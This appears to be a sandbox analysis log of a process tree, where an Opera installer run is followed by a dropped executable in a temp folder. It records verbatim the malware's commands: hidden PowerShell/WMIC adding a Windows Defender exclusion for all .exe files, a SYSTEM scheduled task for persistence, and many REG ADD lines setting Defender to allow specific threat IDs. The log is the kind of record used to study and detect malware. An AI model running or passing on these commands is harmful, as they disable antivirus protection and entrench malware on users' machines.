C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x6fb5b1f4,0x6fb5b200,0x6fb5b20c6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5852
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2192
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1924 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714190227" --session-guid=7480731b-2035-4d4a-bb33-d82ae383b0a0 --server-tracking-blob=NTZlOWEwOTVhNGY0NzBiNTkzNzkyYzk3Y2IzMmQzZTA2MjhkOTdkYWQzNzYyNjAxZmQyMjJjMzkyMmRjNzAxZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk4Mzc0MS44OTc2IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI1MzY3NjIxMy01NmRiLTQ5YzAtOGUwNy04MDk0NTZkNzhjY2YifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=8C040000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2228
C:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC94B00F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6d05b1f4,0x6d05b200,0x6d05b20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3152
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:472
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2940
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141902271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xaa9f88,0xaa9f94,0xaa9fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5532
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe"4⤵PID:5456
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18684⤵
- Program crash
PID:3660
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11444⤵
- Program crash
PID:4008
C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exeC:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:2568
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:5528
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:5888
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5144
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe\" z0 /DtdidU 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3096
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 8765⤵
- Program crash
PID:3192
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18164⤵
- Program crash
PID:3556
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20204⤵
- Program crash
PID:1088
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18924⤵
- Program crash
PID:4140
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9604⤵
- Program crash
PID:5932
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18884⤵
- Program crash
PID:4824
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20884⤵
- Program crash
PID:5060
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:3968
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:1612
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:1452
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1928 -ip 19281⤵PID:5132
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1928 -ip 19281⤵PID:4544
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:5476
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:4140
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:5780
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:3000
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:5840
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:5248
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:4396
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:5460
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:1952
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:4556
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:5832
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:2712
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:5532
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:3900
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:1200
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:6112
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:2344
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1928 -ip 19281⤵PID:5100
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:1676
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:4568
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1928 -ip 19281⤵PID:5728
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1928 -ip 19281⤵PID:3648
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:684
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:5372
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:3772
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1928 -ip 19281⤵PID:4768
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5068
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5248
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1928 -ip 19281⤵PID:4396
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:4988
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:5020
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1928 -ip 19281⤵PID:3228
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1928 -ip 19281⤵PID:3392
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1928 -ip 19281⤵PID:1820
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1928 -ip 19281⤵PID:1732
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1928 -ip 19281⤵PID:4932
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1928 -ip 19281⤵PID:1504
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 19281⤵PID:5492
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:5324
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1928 -ip 19281⤵PID:2120
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:3496
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:472
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:2472
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:3904
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1928 -ip 19281⤵PID:5128
C:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exeC:\Users\Admin\AppData\Local\Temp\3mkeE8uU\SDWk4rSnDwIEsW.exe z0 /DtdidU 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1720
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556 -
PID 452, depth 3: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID 3504, depth 4: C:\Windows\SysWOW64\reg.exe
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
PID 6096, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
PID 1328, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
PID 4708, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
PID 732, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
PID 3012, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
PID 2480, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
PID 1828, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
PID 1816, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
PID 3748, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
PID 5436, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
PID 5844, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
PID 5084, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
PID 1136, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
PID 4188, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
PID 3096, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
PID 680, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
PID 2664, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
PID 1296, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
PID 4004, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
PID 2140, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
PID 1240, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
PID 1612, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
PID 5888, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
PID 796, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
PID 1868, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
PID 3488, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
PID 4192, depth 3: C:\Windows\SysWOW64\reg.exe
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
PID 3104, depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
